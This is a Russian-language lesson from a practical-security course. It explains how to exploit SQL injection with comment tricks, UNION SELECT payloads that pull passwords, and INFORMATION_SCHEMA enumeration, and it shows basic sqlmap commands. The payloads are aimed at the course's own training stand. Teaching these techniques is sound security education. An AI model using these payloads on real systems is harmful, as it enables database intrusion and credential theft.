Введение в практическую безопасность (2019)/Эксплуатация SQL injection
Содержание
Эксплуатация SQL injection
Краткое введение в то что такое SQL injection было в предыдущей статье, теперь о некоторых вещах которые может делать атакующий.
SQL-комментарий
Супер простой трюк. В конце своей инъекции можно добавить символы однострочного SQL-комментария, тогда всё что идет дальше (как правило, остаток исходного SQL-запроса) будет считаться комментарием и проигнорируется. В разных БД символы комментария могут разными, см. документацию, чаще всего это двойной минус --
и/или решетка #
, также бывает классический двойной слеш //
. Фактически, этот трюк уже был использован в примере в предыдущей статье, двойной минус в конце там заставил базу данных проигнорировать оставшуюся от исходного запроса одинарную кавычку в конце.
UNION SELECT
Очень полезным может быть UNION
(вики,доки postgres,курс "Основы современных БД"), который позволяет присоединить к результу одного SELECT
запроса результат еще одного. Если инъекция в операторе SELECT
(что в реальности довольно часто), с помощью UNION
можно добавить в его результат вывод нового, полностью написанного атакующим SELECT
- запроса из друой таблицы, с другими колонками, условиями и т. д.
Чтобы UNION
сработал, требуется чтобы количество и типы колонок совпадали. Помочь с этим может то что в SQL можно писать на месте колонок просто константы (и тогда они просто проставятся на эти места в каждой из строк результата запроса) и то что чаще всего можно использовать вместо любого значения NULL
. Если количество колонок в исходном запросе неизвестно, можно просто подбирать его.
Для такого кода
если параметр login
будет иметь значение admin' UNION SELECT * FROM users WHERE login = 'Kobzon' #
результирующий запрос примет вид
Этот запрос "достанет" из базы данных две записи - соответствующие пользователям "admin" и "Kobzon". Это можно попробовать на стенде: http://sql1.stands.course.secsem.ru/by-login?login=admin'+UNION+SELECT+*+FROM+users+WHERE+login+=+'Kobzon'+%23
Обратите внимание что решетка закодирована URL-кодированием (вики) и выглядит как %23
. В данном случае это необходимо, т. к. решетка в URL имеет специальное значение - отделяет хеш урла (вики), который не посылается на сервер вообще (как и сама решетка). То есть если её не закодировать то по неё URL просто обрежется.
Конечно, пример тривиальный, так как мы получаем те же колонки из той же таблицы, это можно было бы сделать и без UNION
. Вот более интересный пример: если значение login
будет admin' UNION SELECT id,password,NULL,NULL,NULL FROM p4ssww0rdz WHERE id >= 2 #
то результирующий SQL-запрос примет вид
И в его результат попадут пароли всех пользователей с id
начиная с 2. На стенде: http://sql1.stands.course.secsem.ru/by-login?login=admin'+UNION+SELECT+id,password,NULL,NULL,NULL+FROM+p4ssww0rdz+WHERE+id+%3e%3d+2+%23 (символ >
здесь также URL-закодирован).
Здесь NULL
"забивает" лишние колонки, то что их нужно было именно 3 можно понять из схемы данных (код стенда выложен), там в таблице users
5 колонок, также это можно было получить подбором.
Еще при использовании UNION
бывает проблема что код приложения отдаёт не все строки результата, а только часть, например только первую (так обычно бывает когда разработчик предполагал что запрос вернет только одну строку). В этом случае можно просто сделать невыполнимое условие в WHERE
исходного запроса - тогда он вернёт 0 строк и в выдачу попадёт строка из присоединенного SELECT
'а. Например nonexistent' and 1=0 UNION SELECT id,password,NULL,NULL,NULL FROM p4ssww0rdz WHERE id >= 2 #
.
Метаданные
Как правило, при эксплуатации SQL injection мешает то что неизвестны имена таблиц, имена и типы колонок. Может помочь то что в современных базах данных как правило есть специальные таблицы с метаданными, которые содержат всю схему данных базы. У разных СУБД эти таблицы называются и устроены по-разному, про их устройство можно почитать в документации. Например, у MySQL таблицы с метаданными хранятся в базе INFORMATION_SCHEMA
(документация) - информация о существующих базах данных лежит в таблице SCHEMATA
, о таблицах - в TABLES
, о колонках - в COLUMNS
и так далее.
C таким payload nonexistent' and 1=0 UNION SELECT 0,SCHEMA_NAME,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA #
можно получить список всех существующих баз данных (http://sql1.stands.course.secsem.ru/by-login?login=nonexistent'+and+1=0+UNION+SELECT+0,SCHEMA_NAME,NULL,NULL,NULL+FROM+INFORMATION_SCHEMA.SCHEMATA+%23), с таким nonexistent' and 1=0 UNION SELECT 0,concat(concat(table_name, ' '),column_name),NULL,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = 'webapp' #
- список всех таблиц с названиями колонок в БД webapp
(http://sql1.stands.course.secsem.ru/by-login?login=nonexistent'+and+1=0+UNION+SELECT+0,concat(concat(table_name,+'+'),column_name),NULL,NULL,NULL+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA+=+'webapp'+%23 ). Здесь в этом последнем запросе использована ещё одна довольно полезная штука - функция, точнее в данном случае функцию MySQL CONCAT (документация).
sqlmap
Существует ряд инструментов которые умеют обнаруживать и/или эксплуатировать SQL injection. Главный из них - sqlmap. Это тулза напитоне, которая умеет брать запрос к сайту и подставлять в значения его параметров разные атаки на SQLi. Как им пользоваться отлично описано в их usage, базовое использование - передача sqlmap'у урла через параметр -u
(этого достаточно если уязвимый параметр в URL и можно эксплуатировать GET-запросом)
python sqlmap.py -u http://sql1.stands.course.secsem.ru/by-login?login=admin
либо файла с HTTP-запросом через -r
(это может понадобиться если уязвим параметр, передаваемый в теле POST-запроса или, скажем, HTTP-заголовке)
python sqlmap.py -r request.txt
где в request.txt
записан HTTP-запрос, например
GET /by-login?login=admin HTTP/1.1Host: sql1.stands.course.secsem.ru User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1